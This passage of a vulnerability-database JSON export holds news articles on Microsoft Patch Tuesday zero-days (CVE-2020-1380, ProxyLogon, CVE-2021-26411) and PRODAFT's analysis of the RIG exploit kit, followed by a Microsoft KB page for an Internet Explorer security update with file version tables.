Codecs](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1585>)\n * Listen to audio \u2014 thanks to bugs affecting Windows Media Audio Codec\n * Browser a website \u2014 thanks to 'all time buggy' Internet Explorer\n * Edit an HTML page \u2014 thanks to an [MSHTML Engine](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1567>) flaw\n * Read a PDF \u2014 thanks to a loophole in Microsoft Edge PDF Reader\n * Receive an email message \u2014 thanks to yet another bug in [Microsoft Outlook](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1483>)\n \nBut don't worry, you don't need to stop using your computer or without Windows OS on it. All you need to do is click on the Start Menu \u2192 open Settings \u2192 click Security and Update, and install if any new update is available. \n \n\n\n## Install Updates! Two Zero-Days Under Active Attacks\n\n \nAnother reason why you should not ignore this advice is that two of the security flaws have reportedly been exploited by hackers in the wild and one publicly known at the time of release. \n \nAccording to Microsoft, one of the zero-day vulnerabilities under active attack is a remote code execution bug that resides in the scripting engine's library jscript9.dll, which is used by default by all versions of Internet Explorer since IE9. \n \nThe vulnerability, tracked as [CVE-2020-1380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1380>), was spotted by Kaspersky Labs and has been rated critical because Internet Explorer remains an important component of Windows as it still comes installed by default in the latest Windows. \n \nKaspersky researchers explain that the flaw is a use-after-free vulnerability in JScript that corrupts the dynamic memory in Internet Explorer in such a way that an attacker could execute arbitrary code in the context of the current user. So, if the current user is logged in with administrative privileges, the attacker could control the affected system. \n \n\"An attacker could also embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements,\" Microsoft says in its advisory. \n \nExploited by unknown threat actors as part of '**Operation PowerFall**' attacks, a [proof-of-concept exploit](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>) code, and technical details for the zero-day vulnerability have been published by Kaspersky. \n \nThe second zero-day vulnerability\u2014tracked as [CVE-2020-1464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1464>) and under active exploitation\u2014is a Windows spoofing bug that exists when Windows incorrectly validates file signatures. \n \nThis zero-day bug affects all supported versions of Windows and allows attackers to load improperly signed files by bypassing security features intended to prevent incorrectly signed files from being loaded. \n \nBesides these, notably, the batch also includes a critical patch for an elevation of privilege [flaw affecting NetLogon](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) for Windows Server editions, where this RPC service serves as a domain controller. \n \nTracked as 'CVE-2020-1472,' the vulnerability can be exploited by unauthenticated attackers to use Netlogon Remote Protocol (MS-NRPC) to connect to a Domain Controller (DC) and obtain administrative access to run malicious applications on a device on the network. \n \nHome users and server administrators are strongly recommended to apply the latest security patches as soon as possible to prevent malware or miscreants from exploiting and gain complete remote control over their vulnerable computers. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-08-12T12:25:00", "type": "thn", "title": "Microsoft Reveals New Innocent Ways Windows Users Can Get Hacked", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-1483", "CVE-2020-1525", "CVE-2020-1567", "CVE-2020-1585"], "modified": "2020-08-12T12:35:52", "id": "THN:0A61A90DD0F88453854B73FE249BC379", "href": "https://thehackernews.com/2020/08/microsoft-software-patches.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-28T20:14:08", "description": "[![RIG Exploit Kit](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjBhp7MpDIp8BmnU_nBxIn0U5U7pYNA-9qzA3L0FNRPsDg-6r06WOCSuLJy9epJJ4wYNSpY7wz5tkcJ3GizgssrVQXdIAJ9eivo-BW16UV6nKFkQNF4uu4dS7PdotWruSGmcROR5ST_-z32it8WA1T2D0RtDBCYfO-HYsb9p2ZLmk8LOUPzik5XEeiW/s728-e365/exploits.png>)\n\nThe RIG exploit kit (EK) touched an all-time high successful exploitation rate of nearly 30% in 2022, new findings reveal.\n\n\"RIG EK is a financially-motivated program that has been active since 2014,\" Swiss cybersecurity company PRODAFT [said](<https://www.prodaft.com/resource/detail/rig-rig-exploit-kit-depth-analysis>) in an exhaustive report shared with The Hacker News.\n\n\"Although it has yet to substantially change its exploits in its more recent activity, the type and version of the malware they distribute constantly change. The frequency of updating samples ranges from weekly to daily updates.\"\n\nExploit kits are programs used to distribute malware to large numbers of victims by taking advantage of known security flaws in commonly-used software such as web browsers.\n\nThe fact that [RIG EK](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rig-exploit-kit-diving-deeper-into-the-infrastructure/>) runs as a service model means threat actors can financially compensate the RIG EK administrator for installing malware of their choice on victim machines. The RIG EK operators primarily employ malvertising to ensure a high infection rate and large-scale coverage.\n\nAs a result, visitors using a vulnerable version of a browser to access an actor-controlled web page or a compromised-but-legitimate website are redirected using malicious JavaScript code to a proxy server, which, in turn, communicates with an exploit server to deliver the appropriate browser exploit.\n\nThe exploit server, for its part, detects the user's browser by parsing the User-Agent string and returns the exploit that \"matches the pre-defined vulnerable browser versions.\"\n\n\"The artful design of the Exploit Kit allows it to infect devices with little to no interaction from the end user,\" the researchers said. \"Meanwhile, its use of proxy servers makes infections harder to detect.\"\n\nSince arriving on the scene in 2014, RIG EK has been observed delivering a wide range of financial trojans, stealers, and ransomware such as [AZORult](<https://www.malware-traffic-analysis.net/2018/01/30/index.html>), [CryptoBit](<https://unit42.paloaltonetworks.com/unit42-cryptobit-another-ransomware-family-gets-an-update/>), [Dridex](<https://thehackernews.com/2022/06/rig-exploit-kit-now-infects-victims-pcs.html>), Raccoon Stealer, and WastedLoader. The operation was [dealt a huge blow](<https://www.bleepingcomputer.com/news/security/rig-exploit-kit-suffers-major-blow-following-coordinated-takedown-action/>) in 2017 following a coordinated action that dismantled its infrastructure.\n\n[![RIG Exploit Kit](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhc-W77ksCVeOKxAHCwlWIPxzC9l7i48HMztDVefT_GTQN6XaD5H-mb8C5D7AiFGke7UyJ5rHfJOhQXKt9x-EyfGBIBCDjKneq6GUScJISxkgozl2YDnqMb57C6zKFVUmzRreQf_EkbmVnevMv6XZmYkkGXuKpQsb6L0VcfniBtPTvtvHytsjEfg53v/s728-e365/exploit-kit.png>)\n\nRecent RIG EK campaigns have [targeted](<https://thehackernews.com/2022/04/new-rig-exploit-kit-campaign-infecting.html>) a memory corruption vulnerability impacting Internet Explorer ([CVE-2021-26411](<https://nvd.nist.gov/vuln/detail/CVE-2021-26411>), CVSS score: 8.8) to deploy RedLine Stealer.\n\nOther browser flaws weaponized by the malware include [CVE-2013-2551](<https://nvd.nist.gov/vuln/detail/CVE-2013-2551>), [CVE-2014-6332](<https://nvd.nist.gov/vuln/detail/cve-2014-6332>), [CVE-2015-0313](<https://nvd.nist.gov/vuln/detail/CVE-2015-0313>), [CVE-2015-2419](<https://nvd.nist.gov/vuln/detail/CVE-2015-2419>), [CVE-2016-0189](<https://nvd.nist.gov/vuln/detail/CVE-2016-0189>), [CVE-2018-8174](<https://nvd.nist.gov/vuln/detail/CVE-2018-8174>), [CVE-2019-0752](<https://nvd.nist.gov/vuln/detail/CVE-2019-0752>), and [CVE-2020-0674](<https://nvd.nist.gov/vuln/detail/cve-2020-0674>).\n\nAccording to data collected by PRODAFT, 45% of the successful infections in 2022 leveraged CVE-2021-26411, followed by CVE-2016-0189 (29%), CVE-2019-0752 (10%), CVE-2018-8174 (9%), and CVE-2020-0674 (6%).\n\nBesides Dridex, Raccoon, and RedLine Stealer, some of the notable malware families distributed using RIG EK are [SmokeLoader](<https://thehackernews.com/2022/07/smokeloader-infecting-targeted-systems.html>), [PureCrypter](<https://thehackernews.com/2023/02/purecrypter-malware-targets-government.html>), [IcedID](<https://thehackernews.com/2023/01/icedid-malware-strikes-again-active.html>), [ZLoader](<https://thehackernews.com/2022/04/microsoft-disrupts-zloader-cybercrime.html>), [TrueBot](<https://thehackernews.com/2022/12/new-truebot-malware-variant-leveraging.html>), [Ursnif](<https://thehackernews.com/2022/10/latest-ursnif-variant-shifts-focus-from.html>), and [Royal ransomware](<https://thehackernews.com/2022/12/royal-ransomware-threat-takes-aim-at-us.html>).\n\nFurthermore, the exploit kit is said to have attracted traffic from 207 countries, reporting a 22% success rate over the past two months alone. The most number of compromises are located in Russia, Egypt, Mexico, Brazil, Saudi Arabia, Turkey, and several countries across Europe.\n\n[![RIG Exploit Kit](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgHW2d3XvxN49JeSd1f1I2t_7jqwMXvWZbzufRHyKvB-lvloj3RLIU8xMMcAN9RImXCK1EPUEWhHZlJ1ofvfKXka6slISXtxBLv56tj9ldKN_j78xm_MDVC0DHWXESA4_ixJ-UbK1tEwyLlUb6srh7Wu6eeIowhT5K7S4TtZqS3yGIMcXdF56qeWpvC/s728-e365/chart.png>)\n\n\"Interestingly enough, the exploit try rates were the highest on Tuesday, Wednesday and Thursday - with successful infections taking place on the same days of the week,\" the researchers explained.\n\nPRODAFT, which also managed to gain visibility into the kit's control panel, said there are about six different users, two of whom (admin and vipr) have admin privileges. A user profile with the alias \"pit\" or \"pitty\" has subadmin permissions, and three others (lyr, ump, and test1) have user privileges.\n\n\"admin\" is also a dummy user mainly reserved for creating other users. The management panel, which works with a subscription, is controlled using the \"pitty\" user.\n\nHowever, an operational security blunder that exposed the git server led PRODAFT to de-anonymize two of the threat actors. It also assessed with high confidence that the developer of the Dridex malware has a \"close relationship\" with the RIG EK's administrators, owing to the additional manual configuration steps taken to \"ensure that the malware was distributed smoothly.\"\n\n\"Overall, RIG EK runs a very fruitful business of exploit-as-a-service, with victims across the globe, a highly effective exploit arsenal and numerous customers with constantly updating malware,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-27T15:33:00", "type": "thn", "title": "Researchers Share New Insights Into RIG Exploit Kit Malware's Operations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551", "CVE-2014-6332", "CVE-2015-0313", "CVE-2015-2419", "CVE-2016-0189", "CVE-2018-8174", "CVE-2019-0752", "CVE-2020-0674", "CVE-2021-26411"], "modified": "2023-02-28T18:45:18", "id": "THN:35964D30086BA86E15030F5A7D404BE6", "href": "https://thehackernews.com/2023/02/researchers-share-new-insights-into-rig.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:02", "description": "[![](https://thehackernews.com/images/-B1GIJUi-Xfc/YEhXRdorEMI/AAAAAAAAB_o/0vVWsLXOqu0OjfRxUmUTUUvsoLhkTBy6QCLcBGAsYHQ/s0/windows-update-download.jpg)](<https://thehackernews.com/images/-B1GIJUi-Xfc/YEhXRdorEMI/AAAAAAAAB_o/0vVWsLXOqu0OjfRxUmUTUUvsoLhkTBy6QCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nMicrosoft plugged as many as [89 security flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>) as part of its monthly Patch Tuesday updates released today, including fixes for an actively exploited zero-day in Internet Explorer that could permit an attacker to run arbitrary code on target machines.\n\nOf these flaws, 14 are listed as Critical, and 75 are listed as Important in severity, out of which two of the bugs are described as publicly known, while five others have been reported as under active attack at the time of release.\n\nAmong those five security issues are a clutch of vulnerabilities known as [ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) that allows adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access.\n\nBut in the wake of Exchange servers coming under [indiscriminate assault](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) toward the end of February by multiple threat groups looking to exploit the vulnerabilities and plant backdoors on corporate networks, Microsoft took the unusual step of releasing out-of-band fixes a week earlier than planned.\n\nThe ramping up of [mass exploitation](<https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/>) after Microsoft released its updates on March 2 has led the company to deploy [another series of security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020>) targeting [older and unsupported](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) cumulative updates that are vulnerable to ProxyLogon attacks.\n\nAlso included in the mix is a patch for zero-day in Internet Explorer (CVE-2021-26411) that was discovered as exploited by North Korean hackers to [compromise security researchers](<https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html>) working on vulnerability research and development earlier this year.\n\nSouth Korean cybersecurity firm ENKI, which publicly [disclosed](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) the flaw early last month, claimed that North Korean nation-state hackers made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer.\n\nAside from these actively exploited vulnerabilities, the update also corrects a number of remote code execution (RCE) flaws in Windows DNS Server (CVE-2021-26877 and CVE-2021-26897, CVSS scores 9.8), Hyper-V server (CVE-2021-26867, CVSS score 9.9), SharePoint Server (CVE-2021-27076, CVSS score 8.8), and Azure Sphere (CVE-2021-27080, CVSS score 9.3).\n\nCVE-2021-26877 and CVE-2021-26897 are notable for a couple of reasons. First off, the flaws are rated as \"exploitation more likely\" by Microsoft, and are categorized as zero-click vulnerabilities of low attack complexity that require no user interaction.\n\nAccording to [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/seven-windows-wonders-critical-vulnerabilities-in-dns-dynamic-updates/>), the vulnerabilities stem from an out of bounds read (CVE-2021-26877) and out of bounds write (CVE-2021-26897) on the heap, respectively, during the processing of [Dynamic Update](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/configure-dns-dynamic-updates-windows-server-2003>) packets, resulting in potential arbitrary reads and RCE.\n\nFurthermore, this is also the second time in a row that Microsoft has addressed a critical RCE flaw in Windows DNS Server. Last month, the company rolled out a fix for [CVE-2021-24078](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) in the same component which, if unpatched, could permit an unauthorized party to execute arbitrary code and potentially redirect legitimate traffic to malicious servers.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T05:37:00", "type": "thn", "title": "Microsoft Issues Security Patches for 89 Flaws \u2014 IE 0-Day Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24078", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26867", "CVE-2021-26877", "CVE-2021-26897", "CVE-2021-27065", "CVE-2021-27076", "CVE-2021-27080"], "modified": "2021-08-13T09:07:37", "id": "THN:BC8A83422D35DB5610358702FCB4D154", "href": "https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2023-06-23T19:31:14", "description": "None\nThis article applies to the following:\n\n * Internet Explorer 11 on Windows Server 2012 R2\n * Internet Explorer 11 on Windows 8.1\n * Internet Explorer 11 on Windows Server 2012\n * Internet Explorer 11 on Windows Server 2008 R2 SP1\n * Internet Explorer 11 on Windows 7 SP1\n * Internet Explorer 9 on Windows Server 2008 SP2\n**Important**\n\n * As of February 11, 2020, Internet Explorer 10 is no longer in support. To get Internet Explorer 11 for Windows Server 2012 or Windows 8 Embedded Standard, see [KB4492872](<https://support.microsoft.com/help/4492872>). Install one of the following applicable updates to stay updated with the latest security fixes:\n * Cumulative Update for Internet Explorer 11 for Windows Server 2012.\n * Cumulative Update for Internet Explorer 11 for Windows 8 Embedded Standard.\n * The March 2021 Monthly Rollup.\n * Some customers using Windows Server 2008 R2 SP1 who activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on affected devices should only be required once. For information on activation, see this [blog](<https://aka.ms/Windows7ESU>) post.\n * WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your patch management and compliance toolsets. \n--- \n \n## Summary\n\nThis security update resolves vulnerabilities in Internet Explorer. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/en-us/security-guidance>).Additionally, see the following articles for more information about cumulative updates:\n\n * [Windows Server 2008 SP2 update history](<https://support.microsoft.com/help/4343218>)\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/help/4009469>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/help/4009471>)\n * [Windows 8.1 and Windows Server 2012 R2 update history](<https://support.microsoft.com/help/4009470>)\n**Important**\n\n * The fixes that are included in this update are also included in the March 2021 Security Monthly Quality Rollup. Installing either this update or the Security Monthly Quality Rollup installs the same fixes.\n * This update is not applicable for installation on a device on which the Security Monthly Quality Rollup or the Preview of Monthly Quality Rollup from March 2021 (or a later month) is already installed. This is because those updates contain all the same fixes that are included in this update.\n * If you use update management processes other than Windows Update and you automatically approve all security update classifications for deployment, this update, the March 2021 Security Only Quality Update, and the March 2021 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/library/hh825699>). \n--- \n \n## Known issues in this security update\n\nWe are currently not aware of any issues in this update.\n\n## How to get and install this update\n\n### Before installing this update\n\nTo install Windows 7 SP1, Windows Server 2008 R2 SP1, or Windows Server 2008 SP2 updates released on or after July 2019, you must have the following required updates installed. If you use Windows Update, these required updates will be offered automatically as needed.\n\n * Install the SHA-2 code signing support updates: \n \nFor Windows 7 SP1, Windows Server 2008 R2, and Windows Server 2008 SP2, you must have the SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) that is dated September 23, 2019 or a later SHA-2 update installed and then restart your device before you apply this update. For more information about SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>). \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)) that is dated March 12, 2019. After update [KB4490628](<https://support.microsoft.com/help/4490628>) is installed, we recommend that you install the December 8, 2020 SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>). \n \nFor Windows Server 2008 SP2, you must have installed the servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)) that is dated April 9, 2019. After update [KB4493730](<https://support.microsoft.com/help/4493730>) is installed, we recommend that you install the October 13, 2020 SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>).\n * Install the Extended Security Update (ESU): \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/en/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n \nFor Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, you must have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems and follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n * For Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>). \n \nFor Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services. \n \nFor Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.**Important **You must restart your device after you install these required updates.\n\n### Install this update\n\nTo install this update, use one of the following release channels.**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update for the following versions:\n\n * Internet Explorer 11 for Windows Server 2012 and Windows Embedded 8 Standard\nFor all other versions, see the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=5000800>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2, Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Server 2012, Windows Embedded 8 Standard, Windows 8.1, Windows Server 2012 R2**Classification**: Security Update \n \n## File information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables.**Note** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n### **Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2**\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.19301| 25-Feb-2019| 22:20| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 17:50| 1,343,488 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:30| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nhtml.iec| 